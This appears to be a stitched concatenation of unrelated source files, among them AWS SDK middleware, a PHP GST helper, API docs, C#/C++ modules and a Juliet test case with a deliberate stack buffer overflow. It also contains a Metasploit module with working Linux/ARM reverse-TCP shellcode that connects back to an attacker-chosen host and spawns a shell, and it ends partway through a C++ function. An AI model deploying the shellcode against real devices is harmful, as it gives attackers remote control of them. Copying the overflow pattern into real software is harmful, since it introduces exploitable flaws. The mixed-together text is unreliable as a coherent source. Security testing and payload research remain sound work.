func (m *idempotencyToken_initializeOpCreateProposal) HandleInitialize(ctx context.Context, in middleware.InitializeInput, next middleware.InitializeHandler) (
	out middleware.InitializeOutput, metadata middleware.Metadata, err error,
) {
	if m.tokenProvider == nil {
		return next.HandleInitialize(ctx, in)
	}

	input, ok := in.Parameters.(*CreateProposalInput)
	if !ok {
		return out, metadata, fmt.Errorf("expected middleware input to be of type *CreateProposalInput ")
	}

	// Only fill the token when the caller left it unset.
	if input.ClientRequestToken == nil {
		t, err := m.tokenProvider.GetIdempotencyToken()
		if err != nil {
			return out, metadata, err
		}
		input.ClientRequestToken = &t
	}
	return next.HandleInitialize(ctx, in)
}
// addIdempotencyToken_opCreateProposalMiddleware registers the idempotency
// token auto-fill middleware, wired to the client's configured provider.
func addIdempotencyToken_opCreateProposalMiddleware(stack *middleware.Stack, cfg Options) {
	stack.Initialize.Add(&idempotencyToken_initializeOpCreateProposal{tokenProvider: cfg.IdempotencyTokenProvider}, middleware.Before)
}
// newServiceMetadataMiddleware_opCreateProposal builds the initialize-step
// middleware that records service metadata (region, service ID, signing name
// and operation name) for the CreateProposal operation.
func newServiceMetadataMiddleware_opCreateProposal(region string) awsmiddleware.RegisterServiceMetadata {
	metadata := awsmiddleware.RegisterServiceMetadata{
		Region:        region,
		ServiceID:     ServiceID,
		SigningName:   "managedblockchain",
		OperationName: "CreateProposal",
	}
	return metadata
}
|
<?php defined('BASEPATH') or exit('No direct script access allowed');
/*
* ==============================================================================
* Author : Sheik
* Email : [email protected]
* For : SRAM POS
* Web : http://srammram.com
* ==============================================================================
*/
/**
 * Gst - helper library building GST tax-summary HTML and computing
 * Indian GST splits (CGST/SGST vs IGST) for SRAM POS invoices.
 */
class Gst
{
    public function __construct() {
    }

    // Delegate unknown property reads to the CodeIgniter super object, so
    // $this->Settings, $this->sma, etc. resolve to the loaded libraries.
    public function __get($var) {
        return get_instance()->$var;
    }

    /**
     * Build the tax-summary HTML for a set of invoice rows (plus optional
     * return rows). Returns '' when summaries are disabled or there are no rows.
     */
    function summary($rows = [], $return_rows = [], $product_tax = 0, $onCost = false) {
        $code = '';
        if ($this->Settings->invoice_view > 0 && !empty($rows)) {
            $tax_summary = $this->taxSummary($rows, $onCost);
            if (!empty($return_rows)) {
                $return_tax_summary = $this->taxSummary($return_rows, $onCost);
                // NOTE(review): the array union operator keeps the left-hand
                // entry when a tax code exists in both summaries, so return
                // rows sharing a code are not merged -- confirm this is intended.
                $tax_summary = $tax_summary + $return_tax_summary;
            }
            $code = $this->genHTML($tax_summary, $product_tax);
        }
        return $code;
    }

    /**
     * Aggregate rows per tax code: item quantity, tax amount and taxable
     * amount (net price or net cost, minus per-item discount).
     */
    function taxSummary($rows = [], $onCost = false) {
        $tax_summary = [];
        if (!empty($rows)) {
            foreach ($rows as $row) {
                if (isset($tax_summary[$row->tax_code])) {
                    $tax_summary[$row->tax_code]['items'] += $row->unit_quantity;
                    $tax_summary[$row->tax_code]['tax'] += $row->item_tax;
                    $tax_summary[$row->tax_code]['amt'] += ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
                } else {
                    $tax_summary[$row->tax_code]['items'] = $row->unit_quantity;
                    $tax_summary[$row->tax_code]['tax'] = $row->item_tax;
                    $tax_summary[$row->tax_code]['amt'] = ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
                    $tax_summary[$row->tax_code]['name'] = $row->tax_name;
                    $tax_summary[$row->tax_code]['code'] = $row->tax_code;
                    $tax_summary[$row->tax_code]['rate'] = $row->tax_rate;
                }
            }
        }
        return $tax_summary;
    }

    /**
     * Render the aggregated tax summary as an HTML table with a total row.
     */
    function genHTML($tax_summary = [], $product_tax = 0) {
        $html = '';
        if (!empty($tax_summary)) {
            $html .= '<h4 style="font-weight:bold;">' . lang('tax_summary') . '</h4>';
            // FIX: close the <thead> properly (was the invalid '</tr></td><tbody>').
            $html .= '<table class="table table-bordered table-striped print-table order-table table-condensed"><thead><tr><th>' . lang('name') . '</th><th>' . lang('code') . '</th><th>' . lang('qty') . '</th><th>' . lang('tax_excl') . '</th><th>' . lang('tax_amt') . '</th></tr></thead><tbody>';
            foreach ($tax_summary as $summary) {
                $html .= '<tr><td>' . $summary['name'] . '</td><td class="text-center">' . $summary['code'] . '</td><td class="text-center">' . $this->sma->formatQuantity($summary['items']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['amt']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['tax']) . '</td></tr>';
            }
            // FIX: open the <tfoot> (the old code emitted '</tbody></tfoot>',
            // closing a footer that was never opened).
            $html .= '</tbody><tfoot>';
            $html .= '<tr class="active"><th colspan="4" class="text-right">' . lang('total_tax_amount') . '</th><th class="text-right">' . $this->sma->formatMoney($product_tax) . '</th></tr>';
            $html .= '</tfoot></table>';
        }
        return $html;
    }

    /**
     * Split an item tax amount for Indian GST: half CGST + half SGST for
     * intra-state ($state truthy), full IGST otherwise. Returns [] when
     * Indian GST is disabled. (Name kept as-is -- callers use this spelling.)
     */
    function calculteIndianGST($item_tax, $state, $tax_details) {
        if ($this->Settings->indian_gst) {
            $cgst = $sgst = $igst = 0;
            if ($state) {
                // Intra-state: rate label is halved; '%' suffix for percentage-type taxes.
                $gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate / 2), 0) . '%' : $this->sma->formatDecimal(($tax_details->rate / 2), 0);
                $cgst = $this->sma->formatDecimal(($item_tax / 2), 4);
                $sgst = $this->sma->formatDecimal(($item_tax / 2), 4);
            } else {
                // Inter-state: the whole tax goes to IGST.
                $gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate), 0) . '%' : $this->sma->formatDecimal(($tax_details->rate), 0);
                $igst = $item_tax;
            }
            return ['gst' => $gst, 'cgst' => $cgst, 'sgst' => $sgst, 'igst' => $igst];
        }
        return [];
    }

    /**
     * Map of Indian state codes to names; when $blank is set, a "select"
     * placeholder is prepended at integer key 0.
     */
    function getIndianStates($blank = false) {
        $istates = [
            'AN' => 'Andaman & Nicobar',
            'AP' => 'Andhra Pradesh',
            'AR' => 'Arunachal Pradesh',
            'AS' => 'Assam',
            'BR' => 'Bihar',
            'CH' => 'Chandigarh',
            'CT' => 'Chhattisgarh',
            'DN' => 'Dadra and Nagar Haveli',
            'DD' => 'Daman & Diu',
            'DL' => 'Delhi',
            'GA' => 'Goa',
            'GJ' => 'Gujarat',
            'HR' => 'Haryana',
            'HP' => 'Himachal Pradesh',
            'JK' => 'Jammu & Kashmir',
            'JH' => 'Jharkhand',
            'KA' => 'Karnataka',
            'KL' => 'Kerala',
            'LD' => 'Lakshadweep',
            'MP' => 'Madhya Pradesh',
            'MH' => 'Maharashtra',
            'MN' => 'Manipur',
            'ML' => 'Meghalaya',
            'MZ' => 'Mizoram',
            'NL' => 'Nagaland',
            'OR' => 'Odisha',
            'PY' => 'Puducherry',
            'PB' => 'Punjab',
            'RJ' => 'Rajasthan',
            'SK' => 'Sikkim',
            'TN' => 'Tamil Nadu',
            'TR' => 'Tripura',
            'UK' => 'Uttarakhand',
            'UP' => 'Uttar Pradesh',
            'WB' => 'West Bengal',
        ];
        if ($blank) {
            array_unshift($istates, lang('select'));
        }
        return $istates;
    }
}
|
[stime](../README.md) › [Globals](../globals.md) › ["Format/Minute"](../modules/_format_minute_.md) › [Minute](_format_minute_.minute.md)
# Class: Minute
Minute format
## Hierarchy
* [Format](_format_.format.md)
↳ **Minute**
## Index
### Methods
* [format](_format_minute_.minute.md#format)
* [formatNumber](_format_minute_.minute.md#protected-formatnumber)
* [parse](_format_minute_.minute.md#parse)
* [parsePaddedAndUnpaddedUnits](_format_minute_.minute.md#protected-parsepaddedandunpaddedunits)
## Methods
### format
▸ **format**(`time`: [Formattable](_formattable_.formattable.md), `format`: string): *string*
*Overrides [Format](_format_.format.md).[format](_format_.format.md#abstract-format)*
*Defined in [Format/Minute.ts:11](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L11)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`time` | [Formattable](_formattable_.formattable.md) |
`format` | string |
**Returns:** *string*
___
### `Protected` formatNumber
▸ **formatNumber**(`number`: number, `leadingZero`: boolean): *string*
*Inherited from [Year](_format_year_.year.md).[formatNumber](_format_year_.year.md#protected-formatnumber)*
*Defined in [Format.ts:27](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L27)*
Format a number to a string and have it include or exclude
leading zeros
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`number` | number | Number to format |
`leadingZero` | boolean | True if leading zeros should be included false otherwise |
**Returns:** *string*
Formatted number
___
### parse
▸ **parse**(`parsable`: string, `format`: string): *number*
*Defined in [Format/Minute.ts:26](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L26)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`parsable` | string |
`format` | string |
**Returns:** *number*
___
### `Protected` parsePaddedAndUnpaddedUnits
▸ **parsePaddedAndUnpaddedUnits**(`parsable`: string, `format`: string, `token`: string): *number*
*Inherited from [Year](_format_year_.year.md).[parsePaddedAndUnpaddedUnits](_format_year_.year.md#protected-parsepaddedandunpaddedunits)*
*Defined in [Format.ts:43](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L43)*
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`parsable` | string | - |
`format` | string | - |
`token` | string | |
**Returns:** *number*
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
Label Definition File: CWE121_Stack_Based_Buffer_Overflow__CWE805.string.label.xml
Template File: sources-sink-33.tmpl.cpp
*/
/*
* @description
* CWE: 121 Stack Based Buffer Overflow
* BadSource: Set data pointer to the bad buffer
* GoodSource: Set data pointer to the good buffer
* Sinks: loop
* BadSink : Copy string to data using a loop
* Flow Variant: 33 Data flow: use of a C++ reference to data within the same function
*
* */
#include "std_testcase.h"
#include <wchar.h>
namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33
{
#ifndef OMITBAD
/* bad(): the deliberately vulnerable variant of this Juliet testcase.
 * Allocates a 50-wchar and a 100-wchar stack buffer via ALLOCA, points
 * `data` at the *small* one, then the sink loop copies a 100-wchar source
 * into it -> stack-based buffer overflow (CWE-121).
 * NOTE: the flaw is intentional test-suite content; do not "fix" it. */
void bad()
{
    wchar_t * data;
    /* Flow variant 33: the sink reads the pointer back through this
     * C++ reference instead of using `data` directly. */
    wchar_t * &dataRef = data;
    wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
    /* dataGoodBuffer is unused here by design; it keeps bad()/goodG2B()
     * structurally symmetric. */
    wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
    /* FLAW: Set a pointer to a "small" buffer. This buffer will be used in the sinks as a destination
     * buffer in various memory copying functions using a "large" source buffer. */
    data = dataBadBuffer;
    data[0] = L'\0'; /* null terminate */
    {
        /* Sink scope: re-read the pointer through the reference
         * (this inner `data` shadows the outer one). */
        wchar_t * data = dataRef;
        {
            size_t i;
            wchar_t source[100];
            wmemset(source, L'C', 100-1); /* fill with L'C's */
            source[100-1] = L'\0'; /* null terminate */
            /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
            for (i = 0; i < 100; i++)
            {
                data[i] = source[i];
            }
            data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
            printWLine(data);
        }
    }
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodG2B() uses the GoodSource with the BadSink */
/* goodG2B(): the fixed variant -- identical to bad() except that `data`
 * is pointed at the 100-wchar buffer, so the 100-wchar copy in the sink
 * fits and no overflow occurs. */
static void goodG2B()
{
    wchar_t * data;
    /* Flow variant 33: sink reads the pointer back through this reference. */
    wchar_t * &dataRef = data;
    /* dataBadBuffer is unused here by design (structural symmetry with bad()). */
    wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
    wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
    /* FIX: Set a pointer to a "large" buffer, thus avoiding buffer overflows in the sinks. */
    data = dataGoodBuffer;
    data[0] = L'\0'; /* null terminate */
    {
        /* Sink scope (shadows the outer `data`). */
        wchar_t * data = dataRef;
        {
            size_t i;
            wchar_t source[100];
            wmemset(source, L'C', 100-1); /* fill with L'C's */
            source[100-1] = L'\0'; /* null terminate */
            /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
            for (i = 0; i < 100; i++)
            {
                data[i] = source[i];
            }
            data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
            printWLine(data);
        }
    }
}
/* good(): entry point for the non-vulnerable variant(s); this testcase
 * only has the goodG2B (good source, bad sink) flow. */
void good()
{
    goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33; /* so that we can use good and bad easily */
/* Standalone driver: runs good() and/or bad() depending on the
 * OMITGOOD/OMITBAD build flags. Only compiled under INCLUDEMAIN. */
int main(int argc, char * argv[])
{
    /* seed randomness */
    srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
    printLine("Calling good()...");
    good();
    printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
    printLine("Calling bad()...");
    bad();
    printLine("Finished bad()");
#endif /* OMITBAD */
    return 0;
}
#endif
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.34011
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace SerialLabs.Data.AzureTable.Properties
{
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
// NOTE(review): this class is generated by StronglyTypedResourceBuilder
// (see the auto-generated header above); edits here will be lost on the
// next ResGen run. Comments below are for readers only.
internal class Resources {

    // Lazily created, cached ResourceManager (see the ResourceManager property).
    private static global::System.Resources.ResourceManager resourceMan;

    // Optional culture override; null means "use the current thread's UI culture".
    private static global::System.Globalization.CultureInfo resourceCulture;

    [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
    internal Resources() {
    }

    /// <summary>
    ///   Returns the cached ResourceManager instance used by this class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Resources.ResourceManager ResourceManager {
        get {
            if (object.ReferenceEquals(resourceMan, null)) {
                global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SerialLabs.Data.AzureTable.Properties.Resources", typeof(Resources).Assembly);
                resourceMan = temp;
            }
            return resourceMan;
        }
    }

    /// <summary>
    ///   Overrides the current thread's CurrentUICulture property for all
    ///   resource lookups using this strongly typed resource class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Globalization.CultureInfo Culture {
        get {
            return resourceCulture;
        }
        set {
            resourceCulture = value;
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Unable to cast type '{0}' to target type '{1}'..
    /// </summary>
    internal static string ExpressionEvaluatorInvalidCast {
        get {
            return ResourceManager.GetString("ExpressionEvaluatorInvalidCast", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Type '{0}' is not supported..
    /// </summary>
    internal static string ExpressionEvaluatorTypeNotSupported {
        get {
            return ResourceManager.GetString("ExpressionEvaluatorTypeNotSupported", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Unable to get value of the node: '{0}'..
    /// </summary>
    internal static string ExpressionEvaluatorUnableToEvaluate {
        get {
            return ResourceManager.GetString("ExpressionEvaluatorUnableToEvaluate", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Unable to serialize type: '{0}'..
    /// </summary>
    internal static string SerializationExtensionsNotSupportedType {
        get {
            return ResourceManager.GetString("SerializationExtensionsNotSupportedType", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Member '{0}' does not supported..
    /// </summary>
    internal static string TranslatorMemberNotSupported {
        get {
            return ResourceManager.GetString("TranslatorMemberNotSupported", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Invalid method '{0}' arguments..
    /// </summary>
    internal static string TranslatorMethodInvalidArgument {
        get {
            return ResourceManager.GetString("TranslatorMethodInvalidArgument", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Method '{0}' does not supported..
    /// </summary>
    internal static string TranslatorMethodNotSupported {
        get {
            return ResourceManager.GetString("TranslatorMethodNotSupported", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Operator '{0}' does not supported..
    /// </summary>
    internal static string TranslatorOperatorNotSupported {
        get {
            return ResourceManager.GetString("TranslatorOperatorNotSupported", resourceCulture);
        }
    }

    /// <summary>
    ///   Looks up a localized string similar to Unable to evaluate an expression: '{0}'..
    /// </summary>
    internal static string TranslatorUnableToEvaluateExpression {
        get {
            return ResourceManager.GetString("TranslatorUnableToEvaluateExpression", resourceCulture);
        }
    }
}
}
|
/**
@file appmodule.cpp
@brief This file is part of Kalinka mediaserver.
@author Ivan Murashko <[email protected]>
Copyright (c) 2007-2012 Kalinka Team
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CHANGE HISTORY
@date
- 2009/04/02 created by ipp (Ivan Murashko)
- 2009/08/02 header was changed by header.py script
- 2010/01/06 header was changed by header.py script
- 2011/01/01 header was changed by header.py script
- 2012/02/03 header was changed by header.py script
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "appmodule.h"
#include "exception.h"
#include "cliapp.h"
#include "db.h"
using namespace klk::app;
//
// Module class
//
// Constructor
// Constructor.
// @param factory   - factory used by the base ModuleWithDB
// @param modid     - this module's id
// @param setmsgid  - CLI message id for the "autostart set" command
// @param showmsgid - CLI message id for the "autostart show" command
// The two CLI ids must be non-empty and distinct (asserted below);
// they are registered as commands in registerProcessors().
Module::Module(klk::IFactory* factory,
               const std::string& modid,
               const std::string& setmsgid,
               const std::string& showmsgid) :
    klk::ModuleWithDB(factory, modid), m_appuuid_mutex(), m_appuuid(),
    m_setmsgid(setmsgid),
    m_showmsgid(showmsgid)
{
    BOOST_ASSERT(m_setmsgid.empty() == false);
    BOOST_ASSERT(m_showmsgid.empty() == false);
    BOOST_ASSERT(m_setmsgid != m_showmsgid);
}
// Retrives application uuid
// Retrieves the application uuid.
// Lazily fetches the uuid for (this module, this host) via the
// `klk_application_uuid_get` stored procedure and caches it in
// m_appuuid; subsequent calls return the cached value.
// The cache is guarded by m_appuuid_mutex.
// @throw Exception when the DB returns a NULL application uuid.
const std::string Module::getAppUUID()
{
    using namespace klk;
    Locker lock(&m_appuuid_mutex);
    if (m_appuuid.empty())
    {
        // retrieve application id
        // `klk_application_uuid_get` (
        // IN module VARCHAR(40),
        // IN host VARCHAR(40),
        // OUT application VARCHAR(40)
        db::DB db(getFactory());
        db.connect();
        db::Parameters params;
        params.add("@module", getID());
        params.add("@host", db.getHostUUID());
        params.add("@application");  // OUT parameter
        db::Result res = db.callSimple("klk_application_uuid_get", params);
        if (res["@application"].isNull())
        {
            throw Exception(__FILE__, __LINE__,
                            "DB error while retriving application uuid");
        }
        m_appuuid = res["@application"].toString();
    }
    return m_appuuid;
}
// Register all processors
// Registers all message processors.
// Extends the base-class registration with the two autostart CLI
// commands, bound to the message ids supplied at construction.
void Module::registerProcessors()
{
    using namespace klk;
    ModuleWithDB::registerProcessors();
    registerCLI(cli::ICommandPtr(new cli::AutostartSet(m_setmsgid)));
    registerCLI(cli::ICommandPtr(new cli::AutostartShow(m_showmsgid)));
}
|
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
# Linux/ARM (little-endian) reverse-TCP shell payload.
# The 'Payload' array below is raw ARM machine code packed little-endian;
# LHOST/LPORT are patched in at the byte offsets declared under 'Offsets',
# and generate() patches the shell path and its argument into the
# placeholder words near the end of the blob.
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Linux Command Shell, Reverse TCP Inline',
      'Description' => 'Connect back to attacker and spawn a command shell',
      'Author' => 'civ',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_ARMLE,
      'Handler' => Msf::Handler::ReverseTcp,
      'Session' => Msf::Sessions::CommandShellUnix,
      'Payload' =>
        {
          # Byte offsets into the packed payload where the framework
          # writes the connect-back address and port.
          'Offsets' =>
            {
              'LHOST' => [ 172, 'ADDR' ],
              'LPORT' => [ 170, 'n' ],
            },
          'Payload' =>
            [
              #### Tested successfully on:
              # Linux 2.6.29.6-cm42 armv6l
              # Linux 2.6.29.6-cyanogenmod armv6l
              # Linux version 2.6.25-00350-g40fff9a armv5l
              # Linux version 2.6.27-00110-g132305e armv5l
              # Linux version 2.6.29-00177-g24ee4d2 armv5l
              # Linux version 2.6.29-00255-g7ca5167 armv5l
              #
              # Probably requires process to have INTERNET permission
              # or root.
              ####
              # socket(2,1,6)
              0xe3a00002, # mov r0, #2 ; 0x2
              0xe3a01001, # mov r1, #1 ; 0x1
              0xe2812005, # add r2, r1, #5 ; 0x5
              0xe3a0708c, # mov r7, #140 ; 0x8c
              0xe287708d, # add r7, r7, #141 ; 0x8d (140+141 = 281 = sys_socket)
              0xef000000, # svc 0x00000000
              # connect(soc, socaddr, 0x10)
              0xe1a06000, # mov r6, r0
              0xe28f1084, # ldr r1, pc, #132 ; 0x84 (address of sockaddr below)
              0xe3a02010, # mov r2, #16 ; 0x10
              0xe3a0708d, # mov r7, #141 ; 0x8d
              0xe287708e, # add r7, r7, #142 ; 0x8e (141+142 = 283 = sys_connect)
              0xef000000, # svc 0x00000000
              # dup2(soc,0) @stdin
              0xe1a00006, # mov r0, r6
              0xe3a01000, # mov r1, #0 ; 0x0
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000
              # dup2(soc,1) @stdout
              0xe1a00006, # mov r0, r6
              0xe3a01001, # mov r1, #1 ; 0x1
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000
              # dup2(soc,2) @stderr
              0xe1a00006, # mov r0, r6
              0xe3a01002, # mov r1, #2 ; 0x2
              0xe3a0703f, # mov r7, #63 ; 0x3f
              0xef000000, # svc 0x00000000
              # execve("/system/bin/sh", args, env)
              # Shrink me here. I am lame.
              0xe28f0048, # add r0, pc, #72 ; 0x48
              0xe0244004, # eor r4, r4, r4
              0xe92d0010, # push {r4}
              0xe1a0200d, # mov r2, sp
              0xe92d0004, # push {r2}
              0xe1a0200d, # mov r2, sp
              0xe92d0010, # push {r4}
              0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0x8>
              0xe92d0002, # push {r1}
              0xe92d2000, # push {sp}
              0xe1a0100d, # mov r1, sp
              0xe92d0004, # push {r2}
              0xe1a0200d, # mov r2, sp
              0xe3a0700b, # mov r7, #11 ; 0xb (sys_execve)
              0xef000000, # svc 0x00000000
              # exit(0)
              0xe3a00000, # mov r0, #0 ; 0x0
              0xe3a07001, # mov r7, #1 ; 0x1
              0xef000000, # svc 0x00000000
              # <af>: sockaddr_in placeholder, overwritten via 'Offsets'
              # port offset = 170, ip offset = 172
              # NOTE(review): the literal below does not match the word in
              # its comment; harmless, since LPORT/LHOST are patched over
              # these bytes before use -- but worth confirming.
              0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
              0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
              # <shell>: zero-filled slot patched by generate() with SHELL
              0x00000000, # .word 0x00000000 ; the shell goes here!
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              # <arg>: zero-filled slot patched by generate() with SHELLARG
              0x00000000 # .word 0x00000000 ; the args!
            ].pack("V*")
        }
      ))

    # Register command execution options
    register_options(
      [
        OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
        OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
      ], self.class)
  end

  # Builds the final payload bytes: takes the packed template from super
  # and splices the SHELL string (at byte 176, max 15 bytes + NUL) and the
  # optional SHELLARG (at byte 192, max 3 bytes + NUL) into the
  # zero-filled slots above.
  def generate
    p = super

    sh = datastore['SHELL']
    if sh.length >= 16
      raise ArgumentError, "The specified shell must be less than 16 bytes."
    end
    p[176, sh.length] = sh

    arg = datastore['SHELLARG']
    if arg
      if arg.length >= 4
        raise ArgumentError, "The specified shell argument must be less than 4 bytes."
      end
      p[192, arg.length] = arg
    end

    p
  end
end
|
/**
* Copyright (c) 2019 Horizon Robotics. All rights reserved.
* @File: LmkPosePostPredictor.cpp
* @Brief: definition of the LmkPosePostPredictor
* @Author: zhengzheng.ge
* @Email: [email protected]
* @Date: 2019-07-17 14:27:05
* @Last Modified by: zhengzheng.ge
* @Last Modified time: 2019-07-17 15:18:10
*/
#include "CNNMethod/PostPredictor/LmkPosePostPredictor.h"
#include <vector>
#include "CNNMethod/CNNConst.h"
#include "CNNMethod/util/util.h"
#include "hobotlog/hobotlog.hpp"
#include "hobotxstream/profiler.h"
namespace xstream {
// Post-processes one CNN run: for every batch and every detected box,
// decodes landmarks (+ optional pose) from the raw mxnet outputs and
// appends the per-box results into run_data->output.
// Output layout: output[batch][slot] is a BaseDataVector whose datas_
// holds one entry per input box, in box order.
void LmkPosePostPredictor::Do(CNNMethodRunData *run_data) {
  int batch_size = run_data->input_dim_size.size();
  run_data->output.resize(batch_size);
  for (int batch_idx = 0; batch_idx < batch_size; batch_idx++) {
    int dim_size = run_data->input_dim_size[batch_idx];
    auto &mxnet_output = run_data->mxnet_output[batch_idx];
    std::vector<BaseDataPtr> &batch_output = run_data->output[batch_idx];
    // Pre-create one result vector per output slot.
    batch_output.resize(output_slot_size_);
    for (int i = 0; i < output_slot_size_; i++) {
      auto base_data_vector = std::make_shared<BaseDataVector>();
      batch_output[i] = std::static_pointer_cast<BaseData>(base_data_vector);
    }
    {
      RUN_PROCESS_TIME_PROFILER(model_name_ + "_post");
      RUN_FPS_PROFILER(model_name_ + "_post");
      // Input slot 0 carries the detection boxes for this batch.
      auto boxes = std::static_pointer_cast<BaseDataVector>(
          (*(run_data->input))[batch_idx][0]);
      for (int dim_idx = 0; dim_idx < dim_size; dim_idx++) {
        std::vector<BaseDataPtr> output;
        auto xstream_box = std::static_pointer_cast<XStreamData<
            hobot::vision::BBox>>(boxes->datas_[dim_idx]);
        // Decodes landmarks/pose for this box; fills `output` slot-wise.
        HandleLmkPose(mxnet_output[dim_idx], xstream_box->value,
                      run_data->real_nhwc, &output);
        // Scatter per-box results into the per-slot vectors.
        for (int i = 0; i < output_slot_size_; i++) {
          auto base_data_vector =
              std::static_pointer_cast<BaseDataVector>(batch_output[i]);
          base_data_vector->datas_.push_back(output[i]);
        }
      }
    }
  }
}
// Decodes one box's raw outputs into exactly two entries of `output`:
// [0] landmarks, [1] pose. When mxnet_outs is empty (no model output for
// this box), both entries are pushed with state INVALID; when the model
// has no pose head (<= 3 output tensors), only the pose is INVALID.
void LmkPosePostPredictor::HandleLmkPose(
    const std::vector<std::vector<int8_t>> &mxnet_outs,
    const hobot::vision::BBox &box,
    const std::vector<std::vector<uint32_t>> &nhwc,
    std::vector<BaseDataPtr> *output) {
  if (mxnet_outs.size()) {
    auto lmk = LmkPostPro(mxnet_outs, box, nhwc);
    output->push_back(lmk);
    if (mxnet_outs.size() > 3) {
      // Tensor 3 is the pose head.
